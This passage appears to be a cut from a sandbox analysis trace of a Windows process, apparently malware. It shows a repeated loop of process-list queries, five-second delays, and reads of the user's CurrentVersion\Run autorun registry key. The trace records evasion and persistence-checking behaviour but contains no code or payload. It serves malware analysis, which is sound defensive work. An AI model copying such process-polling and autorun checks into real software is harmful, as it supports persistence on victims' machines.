RegionSize=0x14e638*=0x10000) returned 0x0 [0187.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.189] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.224] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.224] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.224] NtClose (Handle=0x154) returned 0x0 [0187.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.229] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.232] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.232] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.232] NtClose (Handle=0x154) returned 0x0 [0187.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.236] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.247] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.248] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.248] NtClose (Handle=0x154) returned 0x0 [0187.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.256] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.263] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.263] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.263] NtClose (Handle=0x154) returned 0x0 [0187.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.266] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.279] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.279] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.279] NtClose (Handle=0x154) returned 0x0 [0187.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.285] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.294] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.294] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.294] NtClose (Handle=0x154) returned 0x0 [0187.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.297] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.313] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.313] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.313] NtClose (Handle=0x154) returned 0x0 [0187.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.319] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.328] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.329] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.329] NtClose (Handle=0x154) returned 0x0 [0187.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.332] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.341] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.341] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.341] NtClose (Handle=0x154) returned 0x0 [0187.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.345] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.356] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.357] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.357] NtClose (Handle=0x154) returned 0x0 [0187.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.362] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.372] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.372] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.372] NtClose (Handle=0x154) returned 0x0 [0187.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.376] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.388] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.388] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.388] NtClose (Handle=0x154) returned 0x0 [0187.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0187.393] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0187.404] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0187.404] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0187.404] NtClose (Handle=0x154) returned 0x0 [0187.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0187.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0187.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0187.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0187.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0187.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 